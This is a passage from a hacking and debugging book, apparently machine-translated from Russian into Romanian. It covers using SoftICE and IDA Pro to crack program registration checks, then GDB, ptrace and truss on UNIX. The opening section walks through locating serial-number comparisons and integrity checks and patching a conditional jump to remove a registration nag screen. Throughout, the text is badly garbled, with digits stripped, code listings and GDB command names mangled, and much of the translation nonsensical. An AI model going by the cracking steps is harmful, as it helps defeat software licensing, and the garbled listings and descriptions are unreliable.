принадлежат диалогу # с дескриптором În principiu, puteți pune punctul de oprire pe - adresa procedurii ferestrei (WinPROC) este aceeași pentru ei Introduceți comanda BMSG WM COMMAND șilăsați Softice Apăsați butonul următor, iar debuggerul apare ascultător!După aceea, rămâne doar să otrăvești ușorprocedura ferestrei în căutarea codului care procesează această presă Punctele de date ale datelor sunt cel mai adeseacă datele cheie ale fișierului/înregistrării sunt extrase într -un singur loc și sunt procesate într -un mod completdiferit Prin instalarea punctului de oprire pe funcția GetWindowTexta, interceptăm codul citind numărul de înregistrarepe care l -am introdus Cum se stabilește unde este comparat cu originalul?Este ușor!Deschideți documentația MSDN,priviți funcția GetWindowText și vedeți că indicatorul la linia returnată este în al doilea argument din stânga Aceastaînseamnă că, la momentul apelului la funcția GetWindowTexta, aceasta va fi localizată la ESP + (patru octeți pe HWNDși încă patru la adresa de retur) Introduceți comanda BPX GetWindowTexta, lăsați debuggerul, introduceți numărul deserie în fereastra de editare, apoi faceți clic pe OK Debuggerul apare Notă În exemplul nostru, debuggerul apare, deșiîn alte cazuri poate să nu apară, deoarece totul depinde de ce fel de funcție ari a folosit programatorul, astfel încâtopțiunile sunt posibile, dați comanda d esp-> (dacă Fereastra DAMPA este dezactivată, apoi înainte de a se da comandaWD), apoi comanda p ret - linia pe care am introdus -o în fereastră (Fig ) Tot ce avem nevoie este adresa sa, careîn exemplul considerat este F E Este logic să presupunem că, pentru a compara parola cu originalul, ar trebui să fieluată în considerare din memorie Acest moment este că hackerul, înarmat cu un depanator, ar trebui să fieîncăpățânat Team Storm Cunoașterea cu depanarea a BRSH F E stabilește punctul de oprire la adresa F E ,forțând Softice să plutească la fiecare celulă de contact sau de înregistrare Sună grozav, dar în practică nufuncționează întotdeauna Nu este deloc un fapt că prima supraveghere a debuggerului ne va conduce la codul deprotecție Cel mai probabil, va exista o funcție de bibliotecă care copiază parola către bufferul local transmis prinlanț către alte funcții Și este bine dacă programul are loc la link!Adesea, tamponul este transmis prin valoare, adicăcopiat într -un alt tampon întreg Pe fiecare dintre aceste tampoane, trebuie să puneți capăt opririi, iar numărul totalde puncte ale opririi este de doar patru Mai mult, această restricție nu este impusă de un debugger, ci de arhitecturaprocesorului Orez Determinarea adresei la care este înregistrată parola introdusă de utilizator, cu toate acestea,nu rezultă încă că punctele opririi datelor sunt inutile Dimpotrivă, acest lucru înseamnă că sunt puternice într -o zonăcomplet diferită De exemplu, am aflat că variabila X conține steagul de înregistrare Cum s -a obținut exact acest lucrunu contează Să presupunem că ați îndeplinit un cod care arată așa: EMP [X], O/JZ NAG „Ecran (dacă variabila X este egalăcu zero, eliminați caseta de dialog cu cerința de înregistrare) Cum să determinați exact unde este inițializatăvariabila x?În cele mai multe cazuri, IDA Pro restabilește automat legăturile încrucișate Cu toate acestea,dezvoltatorul mecanismului de protecție poate orbi cu ușurință Dizassembler În același timp, este puțin probabil să facăfață echipei BPM X (setați punctul de oprire pentru acces la o schimbare de x) Și iată o altă opțiune: am schimbatcâțiva octeți în program, iar ea, după ce a descoperit faptul că hacking -ul ei, a refuzat să lucreze Pentru a găsiprocedura de verificare a integrității codului, este suficient să instalați unul sau mai multe puncte ale opririi pecelulele modificate Da, se pot inventa o mulțime de lucruri, principalul lucru este să ai o fantezie!Promovareamanifestărilor externe a stivei din mecanismul de protecție „detectează” este foarte ușoară De regulă, aceasta este fieo fereastră cu un mesaj expirat de încercare, fie un formular pentru introducerea unui număr de serie Este ușor săinstalați un punct de mesaj WM Command, dar ce oferă?Vom fi în procedura ferestrei, în profunzime partea a II-a Tehnicile de bază ale hackerului intestinelor cărora este îngropat codul de protecție Puteți, desigur, să recoltați,dar va dura mult timp Vă doresc să aflați ce echipe Înainte de asta!Găsiți implementarea programului înapoi și vedeți ce cod este determinat de faptul că înregistrareaprogramului Unii debuggeri susțin mecanismul Backstrace (BackTrace), amintindu -și toate comenzile efectuate și salvându-le într -un tampon special Cu toate acestea, acest lucru încetinește foarte mult implementarea programului și afișeazătehnici anti -landare pentru domeniul de aplicare operațional Vom face altfel Softice acceptă stiva de comandă chic,promovând stiva și afișând adresele tuturor funcțiilor materne Nu este destul de echivalent cu înlocuirea urmăririiinversă, dar pentru majoritatea cazurilor este suficient În cazul nostru, răspunsul debuggerului arată așa cum se aratăîn lista Listarea Раскрутка стека в SoftICE :STACK Е Е В oorwiz' text+ AC E Е Е АЗВ USER DefWindowProcW+ Е E FB USER SendMessageW+ Е Е Е СЗ USER WINNLSGetIMEHotkey+ E Е Е Е USER 'EditWndProc+ Е E DF USER iScrollWindow+ Е С EJ EB USER iShowCursor+ Е ВС Е USER SetTimer+ e e e e user 'setrect+ e f a b utilizator 'callwindowprocw+ e f a oorwj z' text veamsts f bc oorwc sau veamsts f bc oorwc sau Afxpostinilog e c f bc oorwiz text+ ac ;AFXWNDPROC CRISVS E Y OORWiz Text+ AC ; E DC E V User ! SetMer+ Primele apeluri aparțin bibliotecii USR DLL și nu neinteresează niciun interes Softice a determinat în mod incorect apelul apelului e H, atribuindu -l Oorwiz, darOorwiz nu poate fi localizat la E V - Această zonă aparține User ) Dar cel de -al unsprezecelea apel este e ,care duce la adresa F A , este foarte interesant Privind aici de un Dizassembler, găsim codul afișat în lista Listarea Un fragment dintr -un fișier dezasamblat care conține o condiționată suspectă Text: az CALL DWORDPTR [EAX+ CH] Text: azes Test EAX, EAX Text: A EE JNZ Short LOC A Text: a f Push [EBP+Arg ,[ESI] Text: a f push [ebp+arg ] text: a f mov ecx, esi text: a fa push [ebp+arg „ ] text: a fdapel dword ptr [eAX+ h] text: a mov [ebp+ebp+ var ], eax;Adresa de retum Text: A Text: A LOC A :;Cod xref: cwnd :: windowproc ()+ tj text: a mov eax, [ebp+var ] text: a pop esi text: a a concediu text: a b retn och gpava întâlnirea cu un debugging a DWORD PTR [EAX+LLOH] - și existăchiar cea la care se află adresa de retur Ea este cea care afișează dialogul de înregistrare Parcurgerea ecranuluiDizassembler, este ușor să găsiți o tranziție condiționată situată la adresa Yiyae, care transferă biroul pentrudialogul returului Schimbând JNZ în JMP Short, vom elimina pentru totdeauna dialogul de pe ecran Desigur, o astfel demăsură nu va înregistra încă programul, dar acesta este încă ceva!Debuggingul DLL Loader (Softice Symbolic Bootloader)vă permite să încărcați bibliotecile dinamice, dar nu le permite să le depanim în modul autonom De fapt, acest lucru nuar trebui să provoace surpriză, deoarece orice astfel de bibliotecă este doar un set de funcții cauzate de procesulprincipal Luați biblioteca oorwiz dll, exportând cele trei funcții cu nume tentante: regwiz initreadlly, regiz inittritrial, regwiz initlicmgr Cum să le depanați?Mergem la Loader , selectați Fișier |Exportul de încărcare,indicați numele bibliotecii (oorwiz dll) Un nou nume apare imediat în lista simbolurilor încărcate (Fig ) Acumdescărcăm fișierul principal executabil (în acest caz, oodled exe) și stabilim punctele funcțiilor de interes pentru noi(bpx regwiz initreadly, bpx regwiz inittritrial, bpx regwiz initlicmgr), forțând debitul să apară atunci când suntnumiți Orez Încărcarea exporturilor din bibliotecile dinamice Deoarece bibliotecile dinamice sunt mutate, adreseledin Dizassembler nu pot coincide cu adresele prezentate de debugger De exemplu, în OorvViz dll Ida Pro definește adresafuncției regwiz - -inittrial ca Loooldooh și Softice ca F Ei bine, cum să trăiești cu ea?Dar cum: adresa de bază aîncărcării (ImageBase) este Loooooooh, în care IDA Pro este sinceră chiar la începutul fișierului Dar biblioteca nupoate fi descărcată pe această adresă, iar sistemul de operare o mută la adresa XXXX, care este echipa MOD din Softice(lista ) Partea a II -a Tehnici de hacker de bază Vizualizațiadrese de descărcare de bază din помощью команды MOD в SoftICE :mod hMod Base Module Name File Name C ntoskrnl\WINNT\System \ntoskml exe oodled F OOF OB oodlrwrs F F F oorwiz CO oodledrs \Program Files\OO Sof tware\DnveLED \ood \Program Files \ OO SOF TWARE \ DNVELD \ OOD\ Program Filesxoo Software \ Driveled \ Oor \ Program Files \ OO Software \ dnveled \ ood Diferența dintre adreselede bază este -F == FoAIiooooo Prin urmare, pentru a traduce adresa prezentată în debuggerul adresat laDizassembler, trebuie adăugat FOAIOO, iar pentru transformarea inversă, respectiv, ar trebui efectuate operațiunilescăzute Concluzia exemplelor luate în considerare este departe de pretutindeni și nu întotdeauna Dezvoltatorii demecanisme de protecție sunt departe de a fi întotdeauna naivi și încă se protejează împotriva hackingului Prin urmare,cel mai bine este să începeți antrenamentul cu o protecție simplă, trecând treptat la mai complexă Debuggerul este uninstrument complex care nu este stăpânit într -o zi Studiul codurilor de mașini este o artă reală care le -a studiattoată viața Deci nu trebuie să vă supărați dacă ceva nu funcționează Cu cât protecția este mai vicleană și cu atât maidificil de hackat, cu atât veți obține mai multă satisfacție de la hacking -ul de succes!Capitolul Caracteristici dedepanare în UNIX și Linux Prima cunoștință cu GDB (analogul debug com pentru MS-DOS, doar mai puternic) provoacă unamestec de dezamăgire cu fanii Windows Documentația grea îi conduce în depresie profundă Epoca de piatra!Pentru astfelde utilizatori, de regulă, rămâne un mister imediat ce Unikesoids reușesc să supraviețuiască în mediul agresiv alacestei lumi primitive?Mai multe linii ale codului sursă al Unix sunt încă amintite de acele vremuri străvechi în carenu există nimic similar cu depanarea interactivă, iar singurul mijloc de combatere a erorilor a fost memoria dedepozitare de urgență Programatorii au fost nevoiți să studieze grămada de imprimare luni întregi, colectând un cod carese prăbușește într -o imagine zveltă Puțin mai târziu, a apărut o imprimare de depanare - operatorii de ieșire,introduși în poziții cheie și imprimând conținutul celor mai importante variabile În cazul unei defecțiuni, o foaieîntreagă de imprimare (în colocialitatea numită „pânză de picior”) a făcut posibilă stabilirea a ceea ce a făcutprogramul înainte de eșec și ce a provocat dezastrul Sigiliul de depanare și -a păstrat relevanța până în zilelenoastre În lumea Windows, este de obicei utilizată doar în versiunile de depanare ale programului (vezi Lista ) șieste eliminat din final (vezi Lista ) Desigur, acest lucru este rău, pentru că, dacă utilizatorii finali au un eșec,atunci doar o groapă de urgență rămâne în mâinile lor, de care poți departe Desigur, sigiliul de depanare consumăresurse semnificative și necesită timp De aceea, există atât de multe sisteme de protocolare în UNIX - OG StandardSyslog, la sistemul avansat de evenimente de evenimente Enterpnse (http://evlog sourceforge net/) Ele reduc cheltuielilegenerale pentru retragere și protocol, crescând semnificativ viteza programului Sigiliul de depanare elimină cu %nevoile de depanare, deoarece debuggerul este utilizat în principal pentru a determina modul în care programul secomportă într -un anumit loc: este tranziția condițională, ce returnează funcția, ce valori sunt conținute în variabileetc Când utilizați imprimarea de depanare, programatorul introduce pur și simplu funcția FPNNTF /SYSLOG în puncteledorite și vizualizează rezultatul!• Listarea Un exemplu de utilizare slabă a debugging -ului #lfdef debug fpnntf (logfile, "a = %x, b = %x, c = %x \ n", a, b, c);#Endif I list Un exemplu de utilizare bună a debugging -uluiLF ( debug ) fpnntf (logfile, "a = %x, b = %x, c = %x \ n", a, b, c); o persoană nu este un servitor de computer !Acestea sunt calculatoare create pentru automatizarea activității umane Prin urmare, UNIX „mecanizează” căutareaerorilor cât mai posibil ), iar bug -urile vor rula din program, cum ar fi șobolanii de pe o navă care se scufundă Notă de către Windows Compilers poate genera, de asemenea, mesaje de eroare care nu sunt inferioare GCC Din păcate,mulți programatori pur și simplu nu acordă o atenție suficientă acestor capacități -Cederea în pas a programului și apunctelor de control ale UNIX sunt utilizate doar în cazuri severe, când toate celelalte fonduri sunt neputincioase Fanii Windows, o astfel de abordare par a fi de nerefuzat, defectuos și teribil de incomod Motivul pentru aceasta estecă Windows este-Layers rezolvă eficient problemele care în UNIX pur și simplu nu apar Diferența dintre culturile deprogramare între Windows și UNIX este de fapt foarte, foarte semnificativă, prin urmare, înainte de a arunca pietre îngrădina altcuiva, plonjați Comandați acasă „Neobișnuit” nu înseamnă „greșit” Unionsoid, care s -a regăsit în ferestre, simte, de asemenea, exactacelași disconfort GPAVA Caracteristici de depanare în UNIX și Linux PTRACE - Fundația pentru GDB O scurtărecenzie a instrumentelor hackerului (inclusiv debuggerii) pentru UNIX și Linux a fost acordată în capitolul Aici,principala atenție va fi acordată utilizării lor practice Vom începe să discutăm caracteristicile depanatului în UNIX cudebuggerul de platformă încrucișat GDB-A La fel ca majoritatea straturilor UNIX, se bazează pe biblioteca PTRACE, careimplementează primitive de depanare la nivel scăzut Pentru depanarea proceselor multi -flux și a aplicațiilor paralele,se recomandă utilizarea bibliotecilor suplimentare și chiar mai bine -debuggeri specializați precum TotalView(http://www etnus com), deoarece GDB nu face față plăcii multi -cele mai bune din cele mai bune cale PTRACE oferăminimul necesar de funcționalitate, permițându -vă să traduceți procesul într -o stare de oprire și reluare aimplementării sale, citirea/scrierea datelor din/către spațiul de adrese al procesului depanat, citiți/scriețiregistrele procesorului În arhitectura I , acestea sunt registre generale, registre de segment, registre de însoțire(inclusiv SSE), precum și registre de depanare ale familiei DRX (sunt necesare pentru organizarea punctelorhardware) Linux poate fi, de asemenea, manipulat de structurile oficiale ale procesului depanat și poate urmăriapelurile funcțiilor sistemice În clonele „corecte” ale UNIX nu există această posibilitate, iar funcționalitatea lipsătrebuie realizată deja în debugger Un exemplu de utilizare a PTRACE în programe este prezentat în lista '■ ": * ! U" scris pentru FreeBSD ♦ include ♦ Includeți ♦ include ♦ include ♦ include ♦ include ♦ include ♦ include int; int water val; contor lung lung = ; // pid al procesului depanat // Înregistrări de așteptare valoareareturnată // contorul instrucțiunilor de urmărire // Deversăm procesul este două ( (PT TRACE ME, , , ); // Apelulprogramului care are nevoie de urmă // (această abordare nu funcționează pentru programele criptate) Pauză;Default: //Procesul parental întârzie „descendent” // Așteptăm până la Partea II va trece la procesul depanat Tehnici dehacking de bază // într -o stare de oprire Așteptați (& wait val);// trecerea filialei înainte de finalizare, în timp ce(wifstopped (wait val)/ * */) {// urmați următoarele instrucțiuni ale mașinii // mergem într -o stare de oprire if(ptrace (pt step, pid, (caddr t) , )) pauză;// Ne așteptăm până când procesul depanat // nu va trece la o stareoprită, Wait (și WATK VAL);// creștem contorul mașinii efectuate // instrucțiuni pe unitate Contor ++;}} // Concluzianumărului de instrucțiuni ale mașinii efectuate Printf ("== %lld \ n", contor);} Un exemplu de utilizare a PTRACE,prezentat în lista , este conceput pentru a calcula numărul de comenzi ale mașinii în utilitatea Îs și este proiectatpentru BSD gratuit Pentru a compila același exemplu sub Linux, înlocuiți PT TRACE ME cu pTrace traace și rt ^Step - peptrace singlestep Biblioteca PTRACE și modul său de utilizator (modul utilizator) sunt disponibile o singură funcție -Ptrace ((int, pid t PID, Caddr t Addr, int Data)), dar această funcție face totul!Dacă doriți, puteți scrie propriulmini-strat special conceput pentru a rezolva o problemă specifică în câteva ore Argumentul Request PTrace Funcții estecel mai important dintre toate Determină acțiunea specifică care va fi efectuată Fișierele de titlu din BSD și Linuxfolosesc diverse definiții, ceea ce face dificilă transferul aplicațiilor PTRACE de pe o platformă la alta În modimplicit, vom folosi definiții din fișierele antet BSD □ PT TRACE ME (în Linux - PTRACE TRAACE) transferă procesulcurent într -o stare de oprire De obicei, este utilizat împreună cu furculița/execuția, deși se găsesc și aplicații auto-trainate Pentru fiecare dintre procese, apelul PT TRACE ME poate fi făcut o singură dată Nu va funcționa pentru aurmări procesul deja următor Consecința mai puțin semnificativă este că procesul nu se poate urmări, la început trebuiesă se despartă Un număr mare de tehnici anti -canalizare se bazează pe acest lucru, pentru a depăși care este necesar săse utilizeze debuggeri care să ocolească PTRACE Procesul depanat trimite un semnal care îl transferă într -o stare deoprire, de la care acesta Poate fi afișat de comanda PT Continue sau PT Step cauzată din contextul procesului parental Funcția de așteptareîntârzie controlul procesului mamă până când procesul depanat intră într -o stare de oprire sau până când se termină(apoi returnează valoarea de ) Argumentele rămase sunt ignorate □ rt attasn (în linux-ptrace attach) se transferă laoprirea procesului deja neglijat cu un identificator de proces dat (PID), în timp ce procesul de strat devine„strămoșul” său Argumentele rămase sunt ignorate Procesul ar trebui să aibă același UID ca procesul de depanare În plus,nu ar trebui să fie procesul setuid/setDuid (cu excepția cazului în care procesul defiant are privilegii rădăcină) □PT DETACH (în Linux - Ptrace detach) oprește depanarea procesului cu un PID dat (ambele conform RT ATTASN și înPT TRACE ME) și își reia execuția normală Toate celelalte argumente sunt ignorate CPAVA Caracteristici de depanare înUNIX și Linux □ PT Continue (în Linux-PTRACE CONT) reia implementarea procesului depanat cu un PID dat fără a rupeconexiunea cu procesul de strat Dacă addr == (în Linux - ), execuția continuă de la locul ultimei opriri, altfel - dela adresa specificată Argumentul Data stabilește numărul semnalului trimis de procesul depanat (zero - nu existăsemnale) □ PT - PAS (în Linux - PTRACE SINGLESTEP) efectuează un proces -pas -pas cu un PID dat: Efectuați următoareleinstrucțiuni ale mașinii și mergeți la starea de oprire (sub I , acest lucru este obținut printr -un pluton deurmărire, deși unii Bibliotecile „Hacker” folosesc puncte hardware) BSD necesită ca argumentul addr să fie , Linux seașteaptă să vadă Argumentele rămase sunt ignorate □ PT READ I/PT READ D (în Linux - PTRACE PEEKTEXT/PTRACE PEEKDATA)Citiți cuvântul mașinii din zona de cod a spațiului vizat al procesului depanat, respectiv Pe majoritatea platformelormoderne, ambele echipe sunt complet echivalente Funcția PTRACE acceptă ADDR -ul țintă și returnează o chestiune derezultat □ PT WRITE I/PR READ D (în Linux - PTRACE POKEETEXT, PTRACE POKODEATA) Înregistrați un cuvânt de mașinătransmis la data, la addr □ pt getregs/pt getfpregs/pt getdbregs (în linux-ptrace getregs, ptrace getfpregs,ptrace getfpxregs) Registre de scop general de citire, registre segmentate și de depanare, la procesul de memorie-strat,setat de pointerul addr Acestea sunt comenzi dependente de sistemic, acceptabile numai pentru platforma i Descriereastructurii registrului este conținută în fișierul □ PT SETREGS/PT SETFPREGS/PT SETDBREGS (în Linux -PTRACE SEETREGS, PTRACE SETFPREG, PTRACE SETFPXREGS) Setați valorile registrului procesului depanat prin copiereaconținutului regiunii memoriei în funcție de pointerul addr □ PT KILL (în Linux - PTRACE KILL) Trimite procesulprocesat Sigkill, care completează execuția procesului depanat Asistență pentru mai multe setări în GDB Determinați dacăversiunea dvs de GDB acceptă mai multe pasaje, puteți utiliza comanda Info Thread (ieșire despre fluxuri) și utilizațicomanda Thread W (cm Lista și ) pentru a comuta între fluxuri )Dacă nu există suport multi -ostezare,actualizați GDB la versiunea x sau instalați un patch special furnizat împreună cu clona UNIX sau distribuităseparat ЛмсіфГ в , Отле^іищогопоточиьіх Прмложенийш повергается (GDB) info threads (GDB) info threads Thread (EWP ) RunEuler (lpvParam= x a ac) at eu kem cpp: Thread (LWP ) x efl in libc read () From /lib/libc so * Fire (LWP ) x în POLI (FDS = x E , NFDS = L, Timeout = ) Fir (IZH> ) x caea în SigSugsuspend GDB) For de debugging Aplicații paralele este recomandat săutilizeze TotalView (Fig ) Partea a II -a Tehnicienii de bază ai hackerului Forte Looogtimix I Fie ed t YiewGroup Process Thread Action Action Poulls Window HEIP!Group (control) > [GO |Halt |Nex I Step |Pune alergare la|Nexijstepij p* t-! ♦ Procesul ( ) Folkjooplinux (la Brea "punctul ) Fig Debuggerul TotalView este uninstrument specializat pentru depanarea aplicațiilor paralele Un scurt ghid pentru GDB GDB este o aplicație de consolărealizată în spiritul clasic al liniei de comandă (Fig ) Și deși GDB a reușit să formeze o grămadă de interfețegrafice frumoase (Fig și ), depanarea interactivă în stilul de depanare turbo în lumea Unix este extrem denepopulară De regulă, acesta este destinul emigranților de pe o platformă Windows, a căror conștiință este ireversibilde ideologia Microsoft Cu alte cuvinte, Putem spune că, dacă Turbo Debugger este un instrument Locksmith, atunci GDB este o mașină curentă software Într -o ziîl vei iubi pentru depanare la nivelul textelor sursă, programul ar trebui să fie compilat cu informații dedepanare În GCC, cheia este responsabilă pentru acest lucru Dacă informațiile de depanare nu sunt disponibile, GDB vadepana programul la nivelul echipelor DizAssembler De obicei, numele fișierului depanat este transmis pe linia decomandă, de exemplu: numele de fișier GDB Pentru a depana procesul activ, indicați în linia de comandă D și utilizațicheia -core == CoreName tasta pentru a conecta nucleul Toți cei trei parametri pot fi încărcați în același timp,schimbând alternativ între ei comanda țintă Echipa țintă EHES trece la un fișier depanat, comanda pentru copilul țintăla procesul atașat, iar SOGA țintă este la nucleele de dump O cheie opțională -Q furnizează retragerea informațiilorprivind drepturile de autor CPAVA Caracteristici de depanare în UNIX și Linux Fig Interfața clasică GDBFig DDD Debugger este o interfață grafică pentru GDB Partea II Tehnici de bază de hacking fig O altăinterfață grafică a GDB prin încărcarea programului în debugger, ar trebui să setați punctul de oprire Pentru aceasta,echipa de pauză este servită Comanda principală B stabilește punctul de oprire pe funcția principală a limbii C, iarcomanda B start-to the Intrance Point către fișierul ELF (cu toate acestea, în unele fișiere se numește altfel) Putețiseta punctul de oprire pe adresa arbitrară, de exemplu: b * x sau b *$ eax Registrele sunt scrise cu litere miciși precedate de semnul dolarului GDB percepe două registre „Common -System”: $ RS - Indicatorul comenzilor și $ SP - unindicator de sticlă Amintiți -vă doar că imediat după încărcarea programului la debugger, ea încă nu are niciun registreși apar doar lansări ale procesului depanat pentru a executa (echipa de rulare, este și D) Debuggerul decide în modindependent ce punct de oprire pentru instalare - software sau hardware Nu este recomandat să îl preveniți, deoareceechipa de instalare forțată a punctului hardware al opririi - HBreak - nu funcționează la toate versiuniledebuggerului Punctele de oprire a datelor din GDB se numesc puncte de ceas Comanda Watch Addr apelează debuggerul ori decâte ori se schimbă conținutul addr, iar comanda AWCHDR este citită/înregistrată în ADDR Echipa RWATCH ADDR reacționeazădoar la lectură, dar nu funcționează în toate versiunile debuggerului Puteți vizualiza lista de opțiuni/puncte deobservare instalate cu comanda Info Break Echipa Clear Deleys toate punctele opririi, iar comanda Clear Addr este toatepunctele de oprire instalate pe această funcție, adresă sau număr de linie Comenzile Activare/Dezactivare vă permit săporniți/să deconectați temporar punctele de oprire Punctele de oprire acceptă sintaxa dezvoltată a comenzilorcondiționale, a căror descriere poate fi găsită în documentație Echipa continuă (prescurtată C) reia execuțiaprogramului întreruptă de punctul de oprire Următoarea echipă N (p n) efectuează n din următoarele linii ale coduluifără a intra în funcțiile investite, iar comanda pas N (s n) face același lucru, dar odată cu intrarea în funcțiileinvestite Dacă valoarea lui N nu este indicată, atunci o linie este efectuată în mod implicit Comenzile Nexti/Stepi facla fel, dar nu funcționează cu linii ale textului original, ci cu comenzi ale mașinii De obicei, acestea sunt capitolul Caracteristicile depanului în UNIX și Linux sunt utilizate împreună cu echipa de afișare/i $ RS (kh/i $ $), careprescrie debuggerul pentru a afișa comanda curentă a mașinii Este suficient să -l numim o dată pe sesiune Echipa JumpAddr transferă controlul în punctul arbitrar al programului, iar echipa de apeluri de apel/fname apelează funcția FNAMEcu argumente!Vă rugăm să rețineți că această oportunitate nu este chiar în softice!Mai mult, apare adesea nevoia Altecomenzi utile: FIMSH - Continuați să ieșiți din funcția curentă (care corespunde comenzii R RET în Softice), până laaddr (u addr) - continuați să executați până la atingerea adresei specificate (când această comandă este lansată fărăargumente, aceasta va opri implementarea programului depanat atunci când se ajunge la următoarea comandă, ceea ce estefoarte relevant pentru cicluri) Folosind comanda de retur, puteți întrerupe execuția funcției cauzate înainte determen Dacă dați comanda de expresie de retur, unde argumentul de expresie este o anumită expresie, atunci sensulacestei expresii va fi o funcție de întoarcere a funcției Echipa Prin Expression (expresie P) afișează valoareaexpresiei (de exemplu, p + ), conținutul variabilei (p my var), conținutul registrului (p $ eac) sau celulele dememorie (P * x , p *$ eah) Dacă trebuie să retrageți mai multe celule - utilizați comanda ADDR X/NH, unde n estenumărul de celule afișate Nu este necesar să puneți un simbol al stelei înainte de adresa în acest caz Echipa InformațiiRegistre (I G) afișează valorile tuturor registrelor disponibile Modificarea conținutului celulelor/registrelor de memorie se realizează prin comanda set De exemplu, setul $ eax = scrie în registrul EAX nul, setul var my var = $ esh Echipa atribuie variabila de înregistrare ECH, iar setul {nesemnatchar*} x = xsss scrie la adresa x OKSS Comanda de dezasamblare addr from addr to produce conținutulmemoriei sub forma unei liste de dizassmistite, a cărei format de prezentare este determinat de comanda set deinstrucțiuni de prestație a disperării set Frame de informații, informații despre informații, informații localeafișează conținutul cadrului de sticlă curent, argumentele funcționale și variabilele locale Pentru a trece la cadrulfuncțiilor materne, comanda Frame N servește ca echipa BackTrace (BT) face la fel ca echipa de stivă de apeluri înstraturile Windows În studiul haldelor, este indispensabil Cu alte cuvinte, o sesiune tipică de lucru cu GDB aratăastfel: încărcăm programul în debugger, dăm comanda b tash (dacă această echipă nu funcționează, atunci comanda b start) După ce am stabilit punctul de oprire, dăm comanda G, după care depanați programul prin pași: n/s Dacă doriți,puteți da comanda KH/I $ RS, astfel încât GDB să arate ce cod este executat în prezent Ieșirea din debugger esterealizată de comanda Quit (Q) Descrierea restului comenzilor poate fi găsită în documentație (a se vedea, de exemplu,http: //www deiorie eom/gnu/does/gdb/gdb toc html#sec contents) Nota de aici a primit o listă cu doar comenzile GDBminime necesare, astfel încât acest material nu înlocuiește documentația din acest scurt gestionare pentru a vă ajuta sănavigați în citirea documentației pentru toți cei care vor începe munca independentă cu GDB în mod permanent Încomparație cu straturile Windows, straturile UNIX sunt caracterizate prin orientare profesională Prezența butoanelortridimensionale în Windows-Layers, pictograme scalabile, meniu pop-up-tot, desigur, este foarte frumoasă Dar în ele nuexistă aproape complet posibilități de automatizare (vă veți deranja în curând să apăsați de mai multe ori la rând, deexemplu, ) În GDB, pentru același obiectiv, este mult mai ușor să scrii macro sau chiar să folosești gata În acestmoment, această echipă este definită doar pentru arhitectura Intel X Opțiunea Inter-Set poate lua Intel sau ATT În modimplicit, se utilizează valoarea ATT, care corespunde sintaxei AT&T utilizate în mod implicit Asamblatori UNIX pentruarhitectură x Partea a II -a Tehnicile de bază de hacking în UNIX sunt puternice și diverse și nu coboară doar laGDB Singurul lucru care lipsește în UNIX este un bun depanator al nivelului nucleului, axat pe lucrul cu fișiere binarefără informații simbolice și teste inițiale Vindecarea copilăriei și rătăcirea asupra multor platforme au impus oamprentă sumbră pe Unix și o dorință neliniștită de toleranță și platformă încrucișată Cu toate acestea,disponibilitatea textelor inițiale face ca această problemă să fie irelevantă Trecerea sistemului de sistem deinterceptare a funcțiilor sistemului este o fereastră reală în lumea interioară a programului studiat, care arată numelefuncțiilor cauzate, argumentele și codurile lor de retur Lipsa verificărilor „suplimentare” pentru erori este boalatuturor programatorilor începători, iar depanatorul nu este cel mai bun instrument pentru căutarea lor În acest scop,este mai bine să utilizați una dintre utilitățile standard - Truss/KTrace sau să luați orice analizorgratuit/comercial Listarea arată protocolul primit folosind Truss Uită -te, înainte de a muri, programul încearcă sădeschidă fișierul meu bun, nu îl găsește și, ca urmare, scade nucleul de dump Desigur, acesta este cel mai simplu caz,dar regula „zece” afirmă că nouăzeci la sută din timpul de depanare sunt în căutarea erorilor care nu sunt deloc demnesă le caute!Listarea Finding errors using the TrussiSS SYSCTL utility(OXBFBFFB , x , x bce , xbffbfb x x ) = ( x ) MMAP ( x x x , - , x ) Geteuid () Geteqidf ()Geteqid) ("/ var/run/ld-efl sohints " ) Citiți ( x , oxbff fbo x ) lseek ( x ) Citiți( x , x x b) Închideți ( ) Acces ( /usr/libc/ Libc So ", ) deschis (" /usr/libc so ", )fstat ( , oxbfffb ) Citiți ( x , xbffeb x ) mmap ( x x x , , x ) Mmap( x e , , x x , , x f ) MMAP ( x oeaoo, x x , - x ) închide ( ) sigacțiune ( ) sigacctionsigill, oxbfffbA , oxbfbfbb ) sigprocmask ( x , x , x ) sigprocmask ( x , x , , x ) SigAction (Sigill, xBFBFFB , x ) sigprocMask ( x , x bbe , oxbfbffbdo) sigprocmask ( x , x bbf , x ) Open ("My Good File", , )Semnal Semnal Process Stopped Datorită = ( x d ) = ( x ) = ( x ) = ( x ) = ( x ) = ( x ) = ( x ) = ( x ) = ( x ) ( x ) = ( x b) = ( x ) = ( x ) = ( x ) = ( x ) = ( x ) = ( x ) = ( x e ) = ( x EA ) = ( x ) = ( x ) = ( x ) = ( x ) = ( x ) err# 'fără astfel de fișier sau director a O scurtă privire de ansamblu a straturilor Unix a fost prezentatăîn capitolul GPAV Caracteristici de depanare în UNIX și Linux Dwarf File Debugging la GDB, deși trecerea de lasoftice la GDB merge de obicei dureros, rețineți că eforturile cheltuite sunt mai mult decât plata În momentul în careGDB este într -adevăr unul dintre cei mai puternici debuggeri moderni După ce am lansat GDB, cădem într -o lume completdiferită, similară cu o pădure densă, în care este foarte ușor să ne pierdem O scurtă descriere a echipelor GDB dinacest capitol a fost deja dată, iar acum este momentul să discutăm cum să echipezi GDB pentru obiectivelehackerului Reținem încă o dată că, înainte de a efectua o valoare practică sub GDB, acest depanator trebuie săstăpânească cu măiestrie acest depanator Spre deosebire de Softice, GDB se bazează pe concepte nevinovate Printrecaracteristicile sale, ar trebui să se remarcă mai întâi o orientare profesională Aceasta înseamnă că este tocmaicomoditatea îndeplinirii sarcinilor practice, și nu simplitatea stăpânirii, în prim plan Pentru a forța acest „monstru”să funcționeze, va trebui să citiți volumele de documentare cu mie de mii de instruiți, dar mai târziu eforturile dvs vor fi bine răsplătite Rețineți, deși o serie de interfețe grafice frumoase au fost dezvoltate pentru GDB (vezisecțiunea „Ghidul scurt al GDB” mai devreme în acest capitol), cei care intenționează să stăpânească cu adevărat acestputernic depanator, se recomandă să refuze utilizarea tuturor acestor grafice Shells discreditează doar ideileprincipale prevăzute în GDB contrazic filozofia sa de depanare interactivă a interfețelor grafice GDB sunt orientatecătre aplicațiile de depanare cu textele originale, în timp ce hackerii sunt angajați în principal în depanareaaplicațiilor pentru care codul sursă nu este pregătit pentru The THE Debugarea fișierelor executabile la debugger estede obicei efectuată sarcina numelui lor (dacă este necesar - cu calea) pe linia de comandă În același timp, este util săindicați cheia -quiet (prescurtat -q) pentru a suprima retragerea informațiilor privind drepturile de autor Pentru 